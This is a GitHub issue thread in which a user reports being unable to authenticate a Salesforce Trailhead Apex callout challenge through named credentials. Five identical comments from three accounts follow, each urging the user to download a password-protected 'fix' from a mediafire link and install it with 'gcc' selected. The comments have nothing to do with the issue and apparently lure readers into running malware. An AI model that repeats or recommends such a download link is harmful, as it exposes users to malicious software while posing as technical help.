### ISSUE TITLE
Issue with completing challenge 1

### ISSUE THREAD

**Issue by calmeeee** [LogicLuminaryy/Solution-Apex-Callouts-Superbadge-Unit-#3]
Can't resolve the first challenge with request to Balanced Living API.
After investigating org's setup, I've found that Trailhead pre-installed a package with named credentials `BalancedLiving` as well as external named credentials `BalancedLivingCredential`.
The authorization mechanism for this challenge is much similar to the one from challenge 3 - there is a custom header with `Authorization` name and `{!'Basic ' & BASE64ENCODE(BLOB($Credential.BalancedLivingCredential.Username & ':' & $Credential.BalancedLivingCredential.Password))}` formula value. But there is nowhere to actually take both these values. The only principal with `DevAccess` name which is created by them contains no such parameters. I guess it's the one which is used in authorization since it's assigned to you through permission set.
The errors I receive while trying different solutions are expected.

1. When I'm just setting up `req.setEndpoint('callout:IntegrationSB__BalancedLiving/rewards');` in the code it tells me `System.CalloutException: Field BalancedLivingCredential.Username does not exist. Check spelling.`
2. If I add Username/Password parameters to existing Principal by myself (e.g. my own login/password from the org) then the service returns `{ "error": "Authentication Attempt Failed" }`.

The trailhead support answered me that "org is fine, just follow the instructions and check configuration article".
Maybe I'm missing something in setup but can't find it? Everything was done by their instructions

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
